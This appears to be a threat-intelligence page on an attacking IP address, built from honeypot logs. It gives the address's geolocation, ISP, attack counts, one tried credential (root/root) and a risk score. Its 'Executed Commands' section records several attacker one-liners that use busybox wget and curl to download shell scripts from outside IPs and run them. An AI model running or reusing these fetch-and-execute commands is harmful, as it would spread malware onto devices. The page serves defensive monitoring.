โš TROYANOSYVIRUS
Active Threat โ€ข HIGH

192.109.200.24

First Detection1/30/2026
Last Activity2/25/2026
ISPOVH SAS
๐ŸŽฏ
411
Total Attacks
๐Ÿ”Œ
3
Ports
๐Ÿ“ก
3
Attack Types
๐Ÿฆ 
0
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ฆ Canada
City
Unknown
ASN
AS16276
ISP
OVH SAS

Attack Types

cowrie
adbhoney
honeytrap

Attacked Ports

2255557788

Associated Malware

No associated malware

Attempted Credentials

๐Ÿ”root/root
1x

Executed Commands

$cd /data/local/tmp/; busybox wget http://91.92.241.197:8080/bins/w.sh; sh w.sh; curl http://91.92.241.197:8080/bins/c.sh; sh c.sh; wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh73x
$cd /data/local/tmp/; busybox wget http://91.92.241.197:5124/2/w.sh; sh w.sh; curl http://91.92.241.197:5124/2/c.sh; sh c.sh; wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh31x
$cd /data/local/tmp/; busybox wget http://103.236.64.121/w.sh; sh w.sh; curl http://103.236.64.121/c.sh; sh c.sh; wget http://103.236.64.121/wget.sh; sh wget.sh; curl http://103.236.64.121/wget.sh; sh wget.sh; busybox wget http://103.236.64.121/wget.sh; sh wget.sh; busybox curl http://103.236.64.121/wget.sh; sh wget.sh24x
$cd /data/local/tmp/; busybox wget http://193.26.115.122/w.sh; sh w.sh; curl http://193.26.115.122/c.sh; sh c.sh; wget http://193.26.115.122/wget.sh; sh wget.sh; curl http://193.26.115.122/wget.sh; sh wget.sh; busybox wget http://193.26.115.122/wget.sh; sh wget.sh; busybox curl http://193.26.115.122/wget.sh; sh wget.sh4x

Risk Assessment

60
/100
LowMediumHighCritical